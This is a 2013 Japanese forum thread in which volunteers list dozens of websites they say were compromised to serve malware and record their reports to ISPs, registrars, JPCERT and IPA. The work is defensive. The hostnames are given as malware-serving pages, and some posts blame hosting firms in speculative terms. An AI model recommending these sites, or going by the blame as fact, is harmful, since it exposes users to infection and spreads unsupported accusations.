www4●ocn●ne●jp/~htgifu/ www8●ocn●ne●jp/~bito/ www8●ocn●ne●jp/~gzwave/ www8●ocn●ne●jp/~k-chico/ www9●ocn●ne●jp/~alingo/
皆様お疲れ様です。
>>105-108 以前の分でおしんにめる届いてたっぽいので纏めてつーほ
フォームどーすべ
>>104 なので診ませんですた。
>>100-101 目がイタイのでしばしリタイア
さいとあどばいざがgdgd。。。orz............
>>105-108 知ってるとこあって驚いた。どうやってこんなに大量に感染サイトを見つけてくるんですか?
112 :
名無しさん@お腹いっぱい。 :2013/06/08(土) 11:25:10.36
ブラウザがブロックする元の情報となっている stopbadware です。
>>110 @のganjaに電話で確認してみました
OCNからの連絡はないとのこと
月曜以降に
>>100 のAに連絡した窓口に
お財布と相談しながら、もしかしたら連絡するかも
114 :
名無しさん@お腹いっぱい。 :2013/06/09(日) 10:28:15.23
ISPはOCNでだらしのないAbuseだし 何度もユーザにメールしても放置。 pacific-ocean●co●jp/
あいぴーあどれすも ぁぅぁぅ
116 :
名無しさん@お腹いっぱい。 :2013/06/09(日) 19:23:44.92
icweb●jp/~mantashokudo/ www●fp-kazuna●com/insu/ showa-ts●co●jp/ www1●ocn●ne●jp/~niryo/ www32●ocn●ne●jp/~sirotaya/
117 :
名無しさん@お腹いっぱい。 :2013/06/09(日) 19:27:11.63
www4●ocn●ne●jp/~music-wa/ www6●ocn●ne●jp/~guuska/rink●htm www6●ocn●ne●jp/~sumika/ www8●ocn●ne●jp/~waga/
おぱようごぜぇやす
くこまでメルとかしまひた
補足
>>116 にもあいぴーあどれす ぁぅぁぅがありますた
んで、いちばんすた、外部さいとが ぁぅぁぅ こりもつーほ
>>117 のいちばんすた、壊れてるけどAviraがぴこーん
今北三g・・・ orz
OCNはこのスレを巡回リストに入れたとの事なので自助努力して貰いましょう
つまり、このスレのOCNの改ざんサイトは、OCNが自主的に対応するということです
あんまり頑張り過ぎると禿げたり目が痛くなるので少しは楽をしましょう>>all
>>110 追加
5月末に急増した改ざん、「IISサーバ」が標的か - 「Gumblar」と類似点
http://www.security-next.com/040688
とはいえ
>>113 の
>>110 @のganja ← これはHPの所有者に電話したので閉鎖されている様ですが
Aoohataは対応されていません
おそらくOCNは口先だけなのでしょうね
なので、警視庁サイバー犯罪対策課の方
お話した通り逮捕しちゃってください
122 :
名無しさん@お腹いっぱい。 :2013/06/10(月) 21:58:40.03
申告したものも真面に対応できないOCNが。。。 デタラメでしょうね。 昔に、出会い系サイトにたいし警察から警告を受けたホスティング屋が 対応が遅かったりしなかったとして幇助で捕まったことがありましたが 本当に逮捕してくれるといいですね。OCNだと良い刺激になるでしょう
123 :
名無しさん@お腹いっぱい。 :2013/06/10(月) 22:05:06.38
そういえばOCNのメアドがわかる29サイトには、直接警告しましたが 50%は2日で対処している。OCNの案内は対処の仕方の案内が駄目なんでしょうね。 期限も切って表示停止にもできないチキンがOCNということでしょう
>>105 >>106 別経由で連絡先わかったとこに電凸。
ほとんど皆さんからの警告も、OCNからの警告も気づいてないです。
むしろ、こっちが疑われて「この電話番号を警察に言う」とか逆切れされた(泣)
やっぱりおしんに元から強制排除してもらうのがいいかもしんない。
> システムメンテナンス作業に伴うサービス停止のお知らせ > > ただ今、システムメンテナンス中のため、 > 弊社ホームページをご利用いただけません。 > > ご不便おかけしますが、しばらくお待ちください。 ガ━━━━━━(゚д゚lll)━━━━━━ン
んー、だめぽ
>>124 お疲れ様ですお疲れ様です。
それとなくJPCERTやIPAにこのスレのこと伝えてあるので……
>>117 のいちばんすた、Script追加されてた
ゆーどーさき こちらの環境だと
>>96
復帰カキコ 頭隠して尻隠さず ってのが某所にあるぽ フミダイかなん
130 :
名無しさん@お腹いっぱい。 :2013/06/11(火) 21:48:45.60
いやービックリ!あのOCNが本当に止めましたよ。 それでは、OCNさん以下も止めてください www1●ocn●ne●jp/~niryo/ www32●ocn●ne●jp/~sirotaya/ www4●ocn●ne●jp/~music-wa/ www6●ocn●ne●jp/~guuska/rink●htm www6●ocn●ne●jp/~sumika/ www8●ocn●ne●jp/~waga/ www9●ocn●ne●jp/~tada1ppo/06aisatukanben●htm www17●ocn●ne●jp/~skynet/
131 :
名無しさん@お腹いっぱい。 :2013/06/11(火) 21:50:10.28
www1●ocn●ne●jp/~agraph/ www1●ocn●ne●jp/~pageone/ www10●ocn●ne●jp/~akachanf/ www11●ocn●ne●jp/~gen0929/ www13●ocn●ne●jp/~yaesu/ www15●ocn●ne●jp/~yktk/ www17●ocn●ne●jp/~omura/
132 :
名無しさん@お腹いっぱい。 :2013/06/11(火) 21:51:12.38
www18●ocn●ne●jp/~b-miz/ www2●ocn●ne●jp/~kyowawin/ www2●ocn●ne●jp/~stkr/ www4●ocn●ne●jp/~sakura77/ www8●ocn●ne●jp/~daitou/ 以下はリダイレクトページ www17●ocn●ne●jp/~addtech/ www17●ocn●ne●jp/~kinsicho/
133 :
名無しさん@お腹いっぱい。 :2013/06/11(火) 21:52:18.91
OCNを動かしてくれた皆さん感謝です。 これも明日止まることを期待。。。
それは無理かと 準備期間が必要でしょ(確認作業+連絡+猶予期間等々)
136 :
名無しさん@お腹いっぱい。 :2013/06/12(水) 21:47:14.90
新規 www11●ocn●ne●jp/~sayacha/ www5●ocn●ne●jp/~fukuzen/ www7●ocn●ne●jp/~sclamp/ 再感染(それも初めて見たパターン 新種?) www16●ocn●ne●jp/~chesnuts/ Toppageだけ対処 www14●ocn●ne●jp/~teamf/touroku●html www17●ocn●ne●jp/~clover4/cosmet_hair●html www5●ocn●ne●jp/~sfuru/houshu/houshu_menu●htm www8●ocn●ne●jp/~aikamu/company●html www9●ocn●ne●jp/~tada1ppo/06aisatukanben●htm
Trojan:JS BlacoleRef.CZ と名前はでてる 他にも一緒に入れられる?MSEはそれしか検出してないんだけど
誤検出っぽい。お騒がせした。
Aviraがピコーン つーほー作業に入ります。。。
つーほすた
142 :
名無しさん@お腹いっぱい。 :2013/06/14(金) 08:09:48.69
www●horizonz●co●jp satochokusen●co●jp
>>130-132 ,136
なかなか対応されないので電話してみました
訃報です
OCNはこのスレの巡回を止めたそうです
正規のフロー(フォームから)に従って連絡があれば対応するとのこと
お問い合わせフォーム
http s:// cgi01.ocn.ne.jp/support/abuse/blog.html
今回は罪滅ぼしの意味合いで私がフォーム発射&完了
&担当部署(セキュリティ)に電話
皆様
お疲れ様です
>>142 NTTPCコミュニケーションズにめるしました。
>>143 ガ━━━━━━(゚д゚lll)━━━━━━ン
147 :
名無しさん@お腹いっぱい。 :2013/06/15(土) 09:23:15.89
www●miwax●co●jp/ nishikutu●co●jp/ chiyoda-nagoya●co●jp/ kaigokeieigakkai●jp/ www●hanabusa-office●jp/ casinotaro●com/ coscos●info/ orpheus●6●ql●bz/top●html defi-pro●com/ himesou●jp/ www●eekuchikomi●com/ www●deaipeace●com/
148 :
名無しさん@お腹いっぱい。 :2013/06/15(土) 13:03:07.84
queenuruga●weblog●tc/ 77x●info/ bukyu●net/ etaiken●info/ www●etaiken●info/ safetyzone●jp/ curesmile●net/
>>147 Hdefi-pro●com/ 連絡済
Ihimesou●jp/ 404
DEFJK デジロックは放置
>>148 @ABCD デジロックは放置
Fテラワロス
お疲れ様です。
こちらからも受け取ってくれるかは不明ですが一通にてつーほーしました。
時間が掛かったので、既に対応してるっぽいのがあるん。。。orz......
>>149 > 404
www草付けるとピコーン
リダイレクトされてるお
151 :
名無しさん@お腹いっぱい。 :2013/06/16(日) 19:29:24.79
www●chiyoda-nagoya●co●jp/ curesmile●net/ shmj●jp/
ハゲスクネモイ
お疲れ様です。
>>151 上二つは
>>150 で一つに纏めてホスティングにめる送付済み
最後のはIPアドレスもあばばばばば
誘導先もあばばばばば
これもIPアドレスあばばばばば
それぞれ分けて二通めるしました。
相次ぐWebサイト改ざん被害 遅れる対応-ばびぶべぼBlog blog.babibubebo.org/archives/648
155 :
名無しさん@お腹いっぱい。 :2013/06/21(金) 22:11:14.21
vol1●co●jp/ favorite-place●co●jp/ aa287●net/ 27●50●104●30/ bluepower●jp/
156 :
名無しさん@お腹いっぱい。 :2013/06/21(金) 22:35:23.34
www●ocn●ne●jp/~usp yc-oiso●co●jp/ www●vertex-co●jp/ vertex-co●jp/ sub-lease●co●jp/
157 :
名無しさん@お腹いっぱい。 :2013/06/21(金) 22:53:40.82
越谷市議会議員 大石みえこ www●me-oec●jp/
一箇所診るのに3時間…… おつかれさまです っと、ゆーわけで155の一番目だけめるしました。 (゚ν゚) 説明ムズカスィネー
159 :
名無しさん@お腹いっぱい。 :2013/06/22(土) 11:38:51.48
www1●ocn●ne●jp/~hiroin/ www1●ocn●ne●jp/~ruri-5k/ www3●ocn●ne●jp/~kyouei/ www3●ocn●ne●jp/~ootsuka3/ www3●ocn●ne●jp/~yuuaikai/ www5●ocn●ne●jp/~itosj/ www5●ocn●ne●jp/~pogo/index5●html www6●ocn●ne●jp/~no-seki/espanol/este_instituto●htm www6●ocn●ne●jp/~snwest/ www6●ocn●ne●jp/~yoko-yh/
160 :
名無しさん@お腹いっぱい。 :2013/06/22(土) 11:41:15.19
www7●ocn●ne●jp/~jasmine1/ www8●ocn●ne●jp/~ntlkk/ www10●ocn●ne●jp/~usp/ www11●ocn●ne●jp/~noburu/ www12●ocn●ne●jp/~hokuyou/ www13●ocn●ne●jp/~tpark/ www15●ocn●ne●jp/~super/4rinbkpad/click-htm/honda-click●htm www16●ocn●ne●jp/~m●hiroba/ www16●ocn●ne●jp/~permayav/ www16●ocn●ne●jp/~voyager3/ www18●ocn●ne●jp/~yrfc/ www2●ocn●ne●jp/~oimo/
161 :
名無しさん@お腹いっぱい。 :2013/06/22(土) 12:37:49.44
福島県商工会連合会 www●do-fukushima●or●jp/fukuseiren/ 商工会ってどこも感染しまくっている
>>155 @ABCD
NTTコミュニケーションズのブツは
>>143 のOCNのフォームでおkなので発射完了
担当部署(セキュリティ)への電話は月曜以降
>>156 @ 404
ABC
NTTコミュニケーションズのブツは
>>143 のOCNのフォームでおkなので発射完了
担当部署(セキュリティ)への電話は月曜以降
D私に分からないのでパス
>>157 議員本人に連絡、完了
>>159-161 後程
164 :
名無しさん@お腹いっぱい。 :2013/06/22(土) 17:44:17.63
kobeiccgolf●or●jp/kita_kobe/gdo/ c-house●or●jp/ akashikaisei-hp●or●jp/recruit_contact kumamoto-norimen●or●jp/ www●la-la-la●or●jp/
>>164 @BOCNフォーム発射完了
ACD月曜以降
166 :
名無しさん@お腹いっぱい。 :2013/06/23(日) 10:17:45.63
esn●co●jp futurebud●co●jp h-seiken●co●jp haruyamakensetsu●co●jp/include/url●js kizaitecto●co●jp kk-nishimaki●co●jp/js/window●js kk-nishimaki●co●jp/js/navi●js mikic●co●jp morisaki-kk●co●jp muratasekkei●co●jp
167 :
名無しさん@お腹いっぱい。 :2013/06/23(日) 10:46:18.92
advance-sakura●co●jp eishin-maoyi●co●jp favorite-place●co●jp grow-ltd●co●jp h-refresh●co●jp innk●co●jp k02●co●jp kaigai-inc●co●jp/resource/secure/ 改ざん kasuga-mfg●co●jp okamoto-denki●co●jp
www●znet●ne●jp/msd/ www●createur-net●com/ www●araiyasan●jp/ www●tuziwa●jp/ ichigu●memopad●org/ 8080並みやね…これ
>>166 @ACDGH OCNフォーム発射完了
EF0c0896確認 OCNフォーム発射完了
B私には分からないのでパス
>>167 @ABCDEFHI
OCNフォーム発射完了
G私には分からないのでOCNへ、改ざん有無の精査を依頼
>>168 www●znet●ne●jp/msd/
鯖丸ごとやられてる感じw
↓
www.google.co.jp/search?hl=ja&source=hp&q=site%3Awww.znet.ne.jp%2Fmsd%2F&btnG=Google+%E6%A4%9C%E7%B4%A2&gbv=1
171 :
名無しさん@お腹いっぱい。 :2013/06/23(日) 12:50:17.93
>>169 >>167 Gのやつ
jsunpack
411eac06a7475cdd11450051ca075fdc17594caf
virustotal
www.virustotal.com/ja/url/7362a2240ccdabcebe7ad4cb0e90512da40669fbe56bb8b881564610d49f2f4e/analysis/1371959125/
www.virustotal.com/ja/file/9da5a899b9d55e1d43718ec0ad6368f9e9ef0242a4e88cd5ddb2cc6d7bfa5fb3/analysis/1371830823/
172 :
名無しさん@お腹いっぱい。 :2013/06/23(日) 15:46:44.85
znetはコンピュータソフト開発のパティオシステムズですね。 どうりで最近三重県ばかりが何故多いのかと思ってた。
お疲れ様です。 166の三番目みます
病理ウイルスも、パンデミックを通り越して常態化した場合は個人の体力や免疫に頼るしかないように コンピュータウイルスも、脆弱性の無い最新の環境(新しいPC、最新のOS)を整えるしかないのでしょう w7が出る前のガンブラー騒動、w8.1が出る直前の今回 タイミング的にもやはり、マイクロソフトの販促キャンペーンでしょうかw 166のBはおそらく <!--0c0896--> から <!--/0c0896--> まで www.virustotal.com/ja/file/e4422ac4ca9fafa8110127ddfff298f9f78065f336dafaacaf8ce9db294a03f1/analysis/1371976952/ 窓口が休みなので月曜以降にフローを確認してから
>>173 ど−ん
フォームはlynx使ってみた。
ちょん切れちゃった。。。orz.......
>>174 んだなす
167の八番目みます applet archive="otxUB.jar"
>>176 とりあえずベンダーに送付
なんか他にもありそう……
( ゚∀゚)アハハ八八ノヽノヽノヽノ \ / \/ \
SPAM扱いされて、いくつかベンダーに届かないでやんよ
>>177
>>170 www.google.com/safebrowsing/diagnostic?site=www.znet.ne.jp/msd/&hl=ja
検索結果を見ると…
>このサイトはコンピュータに損害を与える可能性があります。
>このサイトはコンピュータに損害を与える可能性があります。
>このサイトはコンピュータに損害を与える可能性があります。
>このサイトはコンピュータに損害を与える可能性があります。
>このサイトはコンピュータに損害を与える可能性があります。
>このサイトはコンピュータに損害を与える可能性があります。
>このサイトはコンピュータに損害を与える可能性があります。
\(^o^)/ハジマタwww
>>180 znet.ne.jp は禿にリダイレクトされてるもより
これで対応したつもりなんでしょ
オツカレサマデス こちらの環境では>168の五番目がぁぅぁぅのままだったので鯖管にめるしました。 フォームでは漏れのめあど蹴られちゃう
saitoadobaizanikisaishimasuta
>>181-185 乙カレー
www●fukushima-l●com/forrent/
www●nifa●co●jp/
www●guitaristlip●com/
www●moonshot●co●jp/
www●montessori-japan●com/
消えてもらったほうがいいようなサイト
rockbook01●awe●jp/dekome/
>>186 @サイト所有会社に電話連絡完了(すでに把握していたもより)
Aパス(対応済みと思われ)
BOCNフォーム発射完了
Cサイト所有会社に電話連絡完了
Dサイト所有会社に電話連絡完了
Eデジロックは放置(そもそも無理ぽ)
※デジロック以外は全力で対応
いずれweb改ざんの元凶はデジロックであるとして
司直の手により殲滅
190 :
名無しさん@お腹いっぱい。 :2013/06/25(火) 21:15:55.96
www12●ocn●ne●jp/~kabanos/ www7●ocn●ne●jp/~takara3/ www10●ocn●ne●jp/~clubpome/ www6●ocn●ne●jp/~ohisama1/ www5●ocn●ne●jp/~yukio●ok/ www13●ocn●ne●jp/~touki/ www17●ocn●ne●jp/~bonsai/ www2●ocn●ne●jp/~kikikm/
バリュードメインvalue-domain.com(デジロック)正規フロー窓口を聞き出しました
www.value-domain.com/webabuse.php
↑の一番下にフォームがあります
>>186 E
フォーム発射完了
対応されるかtest
>>186 の2番目
JSとかぁぅぁぅ
さいとあどばいざにきさいしますた
ntt.netはあぶせにめるだけでいいのかな?
>>183 鯖管から対応かんりょのお返事いただきました
上流になるのかな?>鯖管
>>193 >
>>186 の2番目
./common/js/thickbox.js ./common/js/jquery.fontScaler.js"他いっぱい確認しました
www.virustotal.com/ja/file/15652cb5a2c3ec3abecd5530c2615cd863f1fa633a8878a434b43c196082ed11/analysis/1372406516/
トップの0112722100にお知らせしましたが、HPを製作した委託先とは切れていて分かる人はいないそうです
jpサートとIPAの相談電番を案内してみました
>
>>183 >鯖管から対応かんりょのお返事いただきました
乙です
>上流になるのかな?>鯖管
ジャマイカ
>>194 お疲れ様ですお疲れ様です
んでも
>>186 の2番目、今の時点でぃれくとりぃぐゎ(ry
なぜん?
21:00からですん 以前の委託先に緊急連絡したんでしょ そんなんかな ついでに言わしちくり やられたでござる←むかつくねん
りねーむすてるん。なんか公開修正みたいな木が汁 ご愁傷様 > やられたでござる
話題のwww●nifa●co●jp/ 2013XXXXCopy_of_info.php 2013XXXXCopy_of_index.php コードそのまま引きずってるとか・・ なんだよこれww もしかして露出狂?
別件 > Google セーフ ブラウジング > > 内容を送信しました > > Google にご報告いただきありがとうございます。これで報告は完了です。よろしければこちらもご覧ください。 > > 1. ウェブ環境の安全性向上に貢献したご自分の功績を、しばしの間称えてあげましょう。 > > 2. ウェブブラウザが最新バージョンであり、使用しているオペレーティング システムに最新のパッチが適用されていることを確認しましょう。 > > 3. Stopbadware.org にアクセスしてパソコンに感染する可能性のあるマルウェアの詳細について確認しましょう。 超ネムイのでこくまで…… つかぐぐるにBlockされっぱなし。。。orz...........
200 :
名無しさん@お腹いっぱい。 :2013/06/29(土) 08:23:05.72
www4●ocn●ne●jp/~sawa/get-novel●htm www4●ocn●ne●jp/~kiyotomo chiyoichi●com/ www●h-seiken●co●jp art-tokugawa●com vol1●co●jp auseiki●com/ www●okamoto-denki●co●jp/
>>200 @ABCDEFGOCNフォーム発射完了
E
>>155 @ 又貸ししてると無理らしいが、リベンジ
Gテスト的に岡本電気工業株式会社に連絡してみました
202 :
名無しさん@お腹いっぱい。 :2013/07/03(水) NY:AN:NY.AN
>>194 さま
6/28 WEB改ざんに関して丁重にご指導して頂きまして、ありがとうございました。
おかげさまで、ホームページを復旧させることができましたことをこの場をお借りしてご報告させて頂きます。
また、教えて頂いた対策を一通り行いました。
今後は、発見される脆弱部のアップデートと、改ざんされた際の早急な対応を心がけていきたいと思います。
ご教授して頂いたことに深く感謝申し上げます。
>>110 ,120,146,153
追加
ウェブサイト改ざんの増加に関する一般利用者(ウェブ閲覧者)向け注意喚起
www.ipa.go.jp/security/topics/alert20130626.html
相次ぐWeb改ざん、原因はまたもや“Gumblar”か
itpro.nikkeibp.co.jp/article/NEWS/20130702/488823/
Web改ざん検知と脆弱性診断をセットにした「BIGLOBE Webホスティング セキュリティセット」
提供開始〜8月30日までのご契約で3カ月無料キャンペーンを実施〜
www.sankeibiz.jp/business/news/130701/prl1307011548082-n1.htm
>>202 セキュ板の集合知の為せる業です
わざわざ最果ての過疎地へ報告どもですー
まあ既存の何かと似たものがあればそれに例えたほうがわかりやすいからね
・ω・
Last-Modified: Wed, 03 Jul 2013 13:41:32 GMT 81a338確認
>>207-208 鯖管に凸
さいとアドバイザのばぐやろー!!!!!!!!!!!!!!!!!!!!!!
www●gakysyuu●jp/hutyuu●html ぐぐるが警告してるが私には分からないのでm(__)m
(2013/07/10 9:40), JPCERT/CC wrote:
> --------- This is an automatic email from JPCERT/CC. ---------
>
> We would like to acknowledge the receipt of your incident report.
>
> Your incident report will be handled based on our policy. In certain
> situations, we may forward your report to the corresponding
> person/parties in a coordinated manner. Please promptly inform us if
> you do not wish to have your report forwarded.
>
> If you are not the appropriate person to receive this email, please
> disregard this message.
>
> Please feel free to contact us for further questions or comments.
>
> Best regards,
>>192 403
昨日、別件で#0c0896を確認
↑は検体送付の受理返信。一部詳細はさいとあどばいざに
http://megalodon.jp/2013-0709-2158-26/online.drweb.com/result/?url=http%3A%2F%2Frockbook01%2Eawe%2Ejp%2Fdekome%2Findex%2Ehtml やったこと、ばりゅどめと親会社のGMOにつーほ
>>212 こちらの環境ではわからなかったん
くいんしーじょーんずぁゃゃにちかまつもんざぇもんでどぞー
はっぽーしゅうんめぇ
Web閲覧でのマルウェア検知が日本で急増、カスペルスキーが注意喚起 www.itmedia.co.jp/enterprise/articles/1307/05/news082.html >7月1日以降は減少している とりあえず収束かな 二ヶ月くらいはのんびり出来るかな
215 :
名無しさん@お腹いっぱい。 :2013/07/10(水) NY:AN:NY.AN
www1●ocn●ne●jp/~aoyamaco/ www1●ocn●ne●jp/~blitz/ www1●ocn●ne●jp/~satou●mc/ www1●ocn●ne●jp/~tei-teru/ www10●ocn●ne●jp/~kerotyan/ www10●ocn●ne●jp/~win-now/
216 :
名無しさん@お腹いっぱい。 :2013/07/10(水) NY:AN:NY.AN
1ヶ月の第1週に改竄のピークが有り、100サイト位は毎日改竄されているような 状況なので、減ったなんて言えないのではないかな。
217 :
名無しさん@お腹いっぱい。 :2013/07/10(水) NY:AN:NY.AN
www12●ocn●ne●jp/~act53/ www15●ocn●ne●jp/~asla/ www16●ocn●ne●jp/~kaigo-ok/ www2●ocn●ne●jp/~mi-yoshi/ www3●ocn●ne●jp/~kougetsu/ www3●ocn●ne●jp/~nml/
>>216 ガ━━━━━━(゚д゚lll)━━━━━━ン
219 :
名無しさん@お腹いっぱい。 :2013/07/10(水) NY:AN:NY.AN
www4●ocn●ne●jp/~a-6118/ www5●ocn●ne●jp/~camel/ www5●ocn●ne●jp/~kcoreyge/ www5●ocn●ne●jp/~zaitack/ www6●ocn●ne●jp/~kmkk/ www6●ocn●ne●jp/~onodensh/ www7●ocn●ne●jp/~ecoromy/ www8●ocn●ne●jp/~dutchrek/ www8●ocn●ne●jp/~ruah/ ds-sinjo●co●jp www●raisu●co●jp tt-ins●co●jp/
>>219 I
ocnフォーム発射完了&対応出来るのかを確認中
更に、ドコモからショップへ連絡の段取り完了
>>221 ocnセキュリティから回答あり
ocnフォームでは受けられないもより
別経由でverio の窓口を聞き出しました
[email protected] 力尽きたので放置
ドコモ神奈川総務さん、がんばって
使用ブラウザがwindwsと言い張るドコモショップ新城店の相手は私には無理
>>222 担当窓口はso-net法人向け窓口
当該ドメインはメールサーバーのもので作ったのはソネット、とDSは主張しています
昨日、DSサイドからソネットに問い合わせしたところ
改ざんはなく問題ないと回答したとのこと…
と、DSは主張しています
私がソネットに問い合わせしたところ、会員以外の問い合わせには応じられないと電話を切られました(笑
ウイルスに感染したとしても責任は取らないそうです
月曜以降に別の窓口に問い合わせする予定です
余談ですが、改ざんコードが
難読が解かれた不正な iframe に変更されてます
Kaspersky で検出できる様なのでDSにカスペルスキーを導入して貰うのも有りかと
225 :
名無しさん@お腹いっぱい。 :2013/07/13(土) NY:AN:NY.AN
www12●ocn●ne●jp/~dz577-91/ www13●ocn●ne●jp/~smile-cd/ www3●ocn●ne●jp/~nml/ www3●ocn●ne●jp/~skk-west/
>>225 @A
ocnフォーム発射完了
B →
>>217 E リベンジ
ocnフォーム発射完了
C対応されてるもより
>>223 (2013/07/13 0:15),
> Greetings from the NTT Communications Global IP Network Security Team,
>
> This is an automated reply to inform you that we have received your e-mail
> regarding an alleged violation of our Acceptable Use Policy by a customer
> of NTT Communications.
>
> If your issue involves unsolicited commercial e-mail, please reply to us
> with the entire unsolicited e-mail with complete headers if you have not
> already done so. Please limit your e-mail to essential information that
> would help us with investigating the incident. Personal commentary may
> delay the processing of your request.
>
> Please be advised that we can only address abuse issues regarding NTT
> Communications customers. Spam and/or abuse issues involving non-NTT
> Communications customers need to be reported to the Abuse address of the
> originating domain or service provider for proper handling and disposition.
> Please be aware that it is common for spam and Usenet abuse to be generated
> with false or manipulated return addresses, thus the issue may not involve
> NTT Communications or its customers. Please look at the full header
> information, including the received lines, to determine the true origin of
> the e-mail. For Usenet, you can use the 'NNTP posting host' IP address or
> hostname.
>
> We appreciate the time you have taken to report the alleged abuse, however
> due to the volume of e-mails we receive, we are not able to respond
> personally to each complaint received.
[省略]
ntt.netのabuseからは自動返信きてた
>>225-226 お疲れ様です。
229 :
名無しさん@お腹いっぱい。 :2013/07/13(土) NY:AN:NY.AN
sinei-kitchen●com/ kyoei-medical-o2●co●jp fruits-lunch●com/ aomoriya●jp/basic●js www12●big●or●jp/~zero-one/ www2●big●or●jp/~zero-one/ www22●big●or●jp/~zero-one/
>>229 @AB
FirstServer正規フロー窓口↓
supportorder.fsv.jp/form/toiawase_input.aspx ← フォームから対応されるかtest
フォーム発射完了
CDEF
月曜以降に正規フローを確認した後に(お盆なので時間が掛かるかも)
>>203 ,214
追加
www.npa.go.jp/cyberpolice/detect/pdf/20130626.pdf
winXPは更新しても脆弱性は解消されない方向にあるんじゃなかろうかと思われるのですが
警察庁は低能集団ですかw
>>231 OSかえろってのは経済的な問題も出てくるので残念ながら非現実的
ユーザーが自力で持続可能な範囲で基本的な対応を促すしかないんじゃないかと
知り合いに対してでもいきなりPC変えろとは言い難いし
>>232 ・個人が趣味でホームページをもっている場合、趣味であるならお金は惜しまないはず
・企業である場合、企業なら金は惜しむべきではないでしょう
新しいOSの乗ったPC5万有れば買えます
分割でもいいでしょう
ホームページを持たずに趣味でPCを使っているだけならいざしらず
不特定多数が閲覧するホームページを所有するなら必要不可欠な出費であると覚悟するべきでしょ
>>234 web改ざんされないための注意喚起でもあります
サイト所有者が
>>231 を真に受け「最新の状態に更新してるからおkじゃん」と錯誤させることが問題なのです
237 :
名無しさん@お腹いっぱい。 :2013/07/14(日) NY:AN:NY.AN
n-sagami●com/ryoko/ryoko1●html sanyogiken-gp●co●jp/ nature-nail●com/ m-filled●com/
239 :
名無しさん@お腹いっぱい。 :2013/07/14(日) NY:AN:NY.AN
ここも全く対応しない aiweb●or●jp/nagoya-handbag/
240 :
名無しさん@お腹いっぱい。 :2013/07/14(日) NY:AN:NY.AN
インターネット三重 プロバイダが感染! 三重に感染が多いのはこういうところが感染しているからなのでしょう inetmie.or.jp/
お疲れ様です。 240 Lynxでフォームからつーほーしてみました。 文字入力数の限界ぽかった saitoadobaizanimokisaisuta
243 :
名無しさん@お腹いっぱい。 :2013/07/15(月) NY:AN:NY.AN
atene●co●jp/ eishin-maoyi●co●jp/ esn●co●jp/
>>243 ,245
乙ですー
んでAのネームサーバ www.secure.net/? が siteadvisorがレッド&
not found ですが何かあったのでしょうか(棒
250 :
名無しさん@お腹いっぱい。 :2013/07/16(火) NY:AN:NY.AN
大阪府文化財センターのページやられてるのにまだ改善なしか?
>>240 forbidden(403)になってます
昼間電話したのですが、すでに把握していました
>>229 の4は8080系で古そうに感じたけど本当に古いのかもしれない
Last-Modified: Thu, 24 Jun 2010 05:44:22 GMT
レンタル元に確認してみる
txtどこー?
IPA 独立行政法人 情報処理推進機構:2013年7月の呼びかけ
Last-Modified: Mon, 08 Jul 2013 09:53:17 GMT :
http://www.ipa.go.jp/security/txt/2013/07outline.html > 更新履歴
> 2013年 7月 8日 「(2)改ざん有無の確認方法」を「(2)ウェブ改ざんへの対策」へ修正
> 「(3)ウェブ改ざんの被害発生時の対処」内のセキュリティ関連の組織や企業が提供している、無料でウイルスチェックができるウェブサイトへのリンクを修正
> 2013年 7月 5日 「(3)ウェブ改ざんの被害発生時の対処」内のセキュリティ関連の組織や企業が提供している、無料でウイルスチェックができるウェブサイトへのリンクを修正
> 2013年 7月 1日 掲載
>>250 たった今、ラジオニュースで謝罪してるとやってた。
通報したみなさん乙です。
大阪府文化財センターに凸して聞いてみました 委託業者は、サン・ネットワークスとのこと サン・ネットワークスが具体的にどこなのかは分かりませんがw www.siteadvisor.com/sites/http%3A//www.sunnetworks.jp/ イエロー判定カワウソw
263 :
サックー ◆2kgWDl81kI :2013/07/19(金) NY:AN:NY.AN
AVG2013インターネットセキュリティ使ってますが踏む勇気が出ない・・・・
【LINE】「NAVERまとめ」などに不正アクセス、169万件のID流出ニダ━━━<丶`∀´>━━━━!!!! hayabusa3.2ch.net/test/read.cgi/news/1374231868/ 【緊急】LINEで有名なNAVERの個人情報流出 アカウント名・パスワードなどが漏れる engawa.2ch.net/test/read.cgi/poverty/1374227937/ ネバよ!お前もか!注意せネバネバ
265 :
名無しさん@お腹いっぱい。 :2013/07/19(金) NY:AN:NY.AN
nature-nail●com/ ohuk●jp/ tb9●jp/js/jquery●fademover●js www●esn●co●jp/ www●kk-nishimaki●co●jp/newshop/event/springfare●html www7●ocn●ne●jp/~gbusters
げはしくねもい よくよく検索し直したら18金げむのさいとの跡地のようだたー@さいとあどばいざ
>>237 C m-filled●com/
対応されていないので電話してみました
業者には対応するよう依頼しているそうですが、何て言うのか(ry
さて、金銭を要求し対応してあげるという電話があったそうですが
私達のスキルはお金を払って習得したものではなく
善意の方が無償で公開&授けてくれたものです
もしかしたら、お亡くなりになった方もいるかもしれません
私達は力を託されたのです
全てを一人の力でやっているのではありませんよ
身に覚えのある香具師さん
調子こいてると追い込み掛けますよw
> 金銭を要求
ぽかーん
>>268 エロゲ追加
見つけてしまう漏れのスキル(?)にカンパイ
271 :
名無しさん@お腹いっぱい。 :2013/07/21(日) NY:AN:NY.AN
belleohtsu●co●jp featurepics.promos●co●jp ident-prex●co●jp
272 :
名無しさん@お腹いっぱい。 :2013/07/21(日) NY:AN:NY.AN
申告しても対応しないサイト colx●co●jp bio-pf●co●jp kyuhaisui●jp/ nanautsuki●lals-inc●com/ invoke●co●jp arow●co●jp humans●co●jp nom-osaka138●co●jp p-web●co●jp miura-sports●com beridansu●catch-the-future●com/cat130/ netjohono1●com/ takarakuji-ataru●com/ e-ibh●com/ coach-take●com/ www●green-w●co●jp/ www●koubegyuu●com/about●html miidayori●xmiix●com/
>>271 ,272
全部GMOなんですね…
GMOは嫌いです
とりあえず、
>>272 M e-ibh●com/
営業していたので電話しました
一応現状404になりましたが…
四次元の住人と話をしている様で
むかつきましたね
www.npa.go.jp/cyberpolice/detect/ www.npa.go.jp/cyberpolice/detect/pdf/20130607.pdf ↑ こんなものね、誰も見ないと思うんですね なので、直接全ISPに注意喚起の連絡を直接警察庁からした上で 更にプロバイダからユーザに対して注意喚起をして貰う様 警察庁に要請してみました 朝日ネットはやったそうなので出来るはず so-netの件も伝えました もうね、手に負えなくなる悪寒がするねんw
>>271 ,272
正規フローなのかは不明ですが
一応↓からフォーム発射完了
secure.gmo.jp/contact/
>>275 お疲れ様です
> 注意喚起
Domain登録業者にも通達してそのユーザー向けにもしてほすぃ
鯖が海外業者だとちょいメンドイ
Domain登録業、代行業は我関せずの姿勢が多いのは間違ってる
